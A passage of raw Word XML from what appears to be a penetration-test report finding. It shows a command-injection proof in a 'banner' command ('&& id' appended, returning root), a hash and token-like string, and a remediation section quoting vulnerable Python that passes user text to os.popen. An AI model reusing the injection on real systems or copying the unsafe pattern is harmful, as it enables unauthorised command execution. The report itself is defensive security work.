    </w:p>
    <w:p w14:paraId="10DE7744"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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>pIsTOK52x5NH8Um7e1a2PQV8JVn6qeoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41923030"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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204F7C07"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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455E32C" w14:textId="3D82C09A" w:rsidR="00940701" w:rsidRPr="002355AE"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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>110bf4e37f4133c7e6bcb6e3b326322b4cded14fd80c3f64ef34e64090adb568</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23AEE8" w14:textId="03FD82F5"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2355AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8E588"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 xml:space="preserve">&gt; banner -s hacked </w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&amp;&amp; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A3E04" w14:textId="3E5455FA"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 xml:space="preserve">Banner set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">to  </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; id correctly. Run `banner` again to display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7279EE5A"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940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&gt; banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D99E5" w14:textId="0AC074BE"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r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>[…]</w:t>
      </w:r>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="D8DEE9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B590AD" w14:textId="77777777" w:rsidR="00940701" w:rsidRPr="00940701" w:rsidRDefault="00940701" w:rsidP="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4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00940701">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="F4B083" w:themeColor="accent2" w:themeTint="99"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40320830" w14:textId="77777777" w:rsidR="00F308CB" w:rsidRPr="002355AE" w:rsidRDefault="00F308CB" w:rsidP="00F308CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78590062" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="43BB0AD5" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="09709E59" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407781CA" w14:textId="72FD92BE" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidR="00940701" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
            <w:r w:rsidR="00027997" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; </w:t>
            </w:r>
            <w:r w:rsidR="00832F07" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidR="00027997" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">evelopment team of the application </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w14:paraId="43D40E3F" w14:textId="77777777" w:rsidTr="00DB29D8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2F9B3530" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B17B712" w14:textId="55341B66" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sanitize the user input before passing the arguments directly to the function call of</w:t>
            </w:r>
            <w:r w:rsidR="00027997" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cmd_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>banner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="7030A0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">found in </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pseudo-terminal/switch.py</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F1A2C4" w14:textId="2C1236EF" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability lies in the function in line 83, where the user provided text is passed to a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>os.popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> call. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6355A8F2" w14:textId="3C05FBA1" w:rsidR="00027997" w:rsidRPr="002355AE" w:rsidRDefault="00027997" w:rsidP="0002799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DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="F97B58"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>figlet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve"> {}</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>.format</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EC5F66"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>self</w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>.banner_text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C931A1E" w14:textId="16C8A4F0" w:rsidR="00027997" w:rsidRPr="00027997" w:rsidRDefault="00027997" w:rsidP="0002799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027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="C695C6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t xml:space="preserve">return </w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="6699CC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>os.popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>).read()).encode(</w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="99C794"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>'utf-8'</w:t>
            </w:r>
            <w:r w:rsidRPr="00027997">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="D8DEE9"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>), STATUS_ALIVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25EF148A" w14:textId="77777777" w:rsidR="00027997" w:rsidRPr="002355AE" w:rsidRDefault="00027997" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Here it is possible to see that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>self.banner</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is directly formatted into a new variable with the name </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. This variable is then passed to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>os.popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
